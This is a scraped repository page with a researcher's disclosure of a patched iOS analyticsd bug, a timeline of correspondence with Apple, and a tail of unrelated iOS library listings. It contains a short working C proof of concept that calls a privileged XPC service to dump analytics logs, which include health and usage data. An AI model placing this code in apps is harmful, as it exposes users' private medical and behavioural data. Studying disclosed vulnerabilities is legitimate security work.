iOS exploit (fixed in 14.7)

Related tags

Layout swift ios 0day
Overview

Analyticsd pre-14.7 exploit

I've updated this code to avoid using Private API directly. Read more in my blog post. However, that means that now this code is iOS version-specific and possibly device model-specific. So if it doesn't work on your device, recalculate and update the offsets in c.c file. The original code can be found in direct branch.

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day... and Analytics-Daily...). These logs contain the following information (including, but not limited to):

  • medical information (heart rate, count of detected atrial fibrillation and irregular heart rythm events)
  • menstrual cycle length, biological sex and age, whether user is logging sexual activity, cervical mucus quality, etc.
  • device usage information (device pickups in different contexts, push notifications count and user's action, etc.)
  • screen time information and session count for all applications with their respective bundle IDs
  • information about device accessories with their manufacturer, model, firmware version and user-assigned names
  • application crashes with bundle IDs and exception codes
  • languages of web pages that user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That's why it's very hypocritical of Apple to claim that they deeply care about privacy. All this data was being collected and available to an attacker even if "Share analytics" was turned off in settings.

const char * analytics_json(void) {
    xpc_connection_t connection = xpc_connection_create_mach_service("com.apple.analyticsd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
    xpc_connection_set_event_handler(connection, (^(xpc_object_t object){}));
    xpc_connection_resume(connection);
    xpc_object_t xdict = xpc_dictionary_create(0, 0, 0);
    xpc_dictionary_set_string(xdict, "command", "log-dump");
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(connection, xdict);
    return xpc_dictionary_get_string(reply, "log-dump");
}

Timeline:

April 29 2021 - I sent a detailed report to Apple

April 30 2021 - Apple replied that they had reviewed the report and are investigated

May 20 2021 - I've requested a status update from Apple (and recieved no reply)

May 30 2021 - I've requested a status update from Apple

June 3 2021 - Apple replied that they plan to address the issue in the upcoming update

July 19 2021 - iOS 14.7 is released with the fix

July 20 2021 - I've requested a status update from Apple

July 21 2021 - iOS 14.7 security contents list is published, this vulnerability is not mentioned (https://support.apple.com/en-us/HT212601)

July 22 2021 - I've asked Apple a question why the vulnerability is not on the list

Same day I receive the following reply: **Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience. **

July 26 2021 - iOS 14.7.1 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212623)

September 13 2021 - iOS 14.8 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212807) Same day I asked for an explanation and informed Apple that I would make all my reasearch public unless I receive a reply soon.

September 20 2021 - iOS 15.0 security contents list is published, still no mention of this vulnerability (https://support.apple.com/en-us/HT212814)

September 24 2021 - I still haven't received any reply

You might also like...
An Impressive Auto Layout DSL for  iOS, tvOS & OSX. & It is written in pure swift.
An Impressive Auto Layout DSL for iOS, tvOS & OSX. & It is written in pure swift.

KVConstraintKit KVConstraintKit is a DSL to make easy & impressive Auto Layout constraints on iOS, tvOS & OSX with Swift Installation Using CocoaPods

The ultimate API for iOS & OS X Auto Layout — impressively simple, immensely powerful. Objective-C and Swift compatible.
The ultimate API for iOS & OS X Auto Layout — impressively simple, immensely powerful. Objective-C and Swift compatible.

The ultimate API for iOS & OS X Auto Layout — impressively simple, immensely powerful. PureLayout extends UIView/NSView, NSArray, and NSLayoutConstrai

A Swift Autolayout DSL for iOS & OS X
A Swift Autolayout DSL for iOS & OS X

SnapKit is a DSL to make Auto Layout easy on both iOS and OS X. ⚠️ To use with Swift 4.x please ensure you are using = 4.0.0 ⚠️ ⚠️ To use with Swift

Тестовое задание (анкета) на вакансию iOS-разработчика
Тестовое задание (анкета) на вакансию iOS-разработчика

Blogman Задание 1 из 8 Пожалуйста, расскажите о своем опыте написания или использования собственных фреймворков. Какие плюсы в себе несли собственные

Repository for the dgca verifier iOS app.

EU Digital COVID Certificate Verifier App - iOS About • Development • Documentation • Support • Contribute • Contributors • Licensing About This repos

Application iOS de l'outil ViteMaDose

Vite Ma Dose pour iOS Présentation du projet Vite Ma Dose est un outil permettant de détecter les rendez-vous de vaccination. Cette application rapide

A declarative UIKit for improve layout productivity when developing an iOS application

TifoKit A declarative UIKit for improve layout productivity when developing an iOS application Requirements Min. iOS 11 Swift 5+ Installation Currentl

iOS simple project to create half-screen modal view controller with pan
iOS simple project to create half-screen modal view controller with pan

Simple Half-screen view controller, draggable and less code (learning purpose)

iOS 13-14 battery themer

Vivy A free and open source battery themer that's actually good! After the disaster that was my previous battery themer (Juiceless) I decided to make

VidyoPlatform Basic CustomLayouts Reference App for iOS (Swift)VidyoPlatform Basic CustomLayouts Reference App for iOS (Swift)

VidyoPlatform Basic CustomLayouts Reference App for iOS (Swift) VidyoPlatform reference application highlighting how to integrate video chat into a na

Taras Melko 0 Nov 19, 2021
Olvid-ios - Olvid client application for iOS

Olvid Olvid is a private and secure end-to-end encrypted messenger. Contrary to

Olvid 42 Dec 6, 2022
IOS-PokemonQuizApp - Assignment to make a responsive iOS app. App has to connect with an external API

iOS-PokemonQuizApp Assignment to make a responsive iOS app. App has to connect with an external API. The Project The idea of the project is to make a

BennyDB 0 Jan 9, 2022
Flixtor-iOS - iOS streaming app inspired by Netflix that allows you to watch any film and series

Flixtor-iOS iOS streaming app inspired by Netflix that allows you to watch any f

Kevin Liu 0 Jan 14, 2022
IOSAnimationSample-master - An iOS Animation playground to exercise different iOS Animations

iOS Animation Sample This app is an iOS Animation playground to exercise differe

Kushal Shingote 1 Feb 5, 2022
BrickKit is a delightful layout library for iOS and tvOS. It is written entirely in Swift!

BrickKit is a delightful layout library for iOS and tvOS. It is written entirely in Swift! Deprecated BrickKit is being phased out at Wayfair, and the

Wayfair Tech – Archive 608 Sep 15, 2022
LayoutKit is a fast view layout library for iOS, macOS, and tvOS.

?? UNMAINTAINED ?? This project is no longer used by LinkedIn and is currently unmaintained. LayoutKit is a fast view layout library for iOS, macOS, a

LinkedIn's Attic 3.2k Dec 27, 2022
Fast Swift Views layouting without auto layout. No magic, pure code, full control and blazing fast. Concise syntax, intuitive, readable & chainable. [iOS/macOS/tvOS/CALayer]

Extremely Fast views layouting without auto layout. No magic, pure code, full control and blazing fast. Concise syntax, intuitive, readable & chainabl

layoutBox 2.1k Dec 22, 2022
Simple static table views for iOS in Swift.

Simple static table views for iOS in Swift. Static's goal is to separate model data from presentation. Rows and Sections are your “view models” for yo

Venmo 1.3k Jan 5, 2023
An easy way to create and layout UI components for iOS (Swift version).

Introduction Cupcake is a framework that allow you to easily create and layout UI components for iOS 8.0+. It use chaining syntax and provides some fr

nerdycat 288 Oct 9, 2022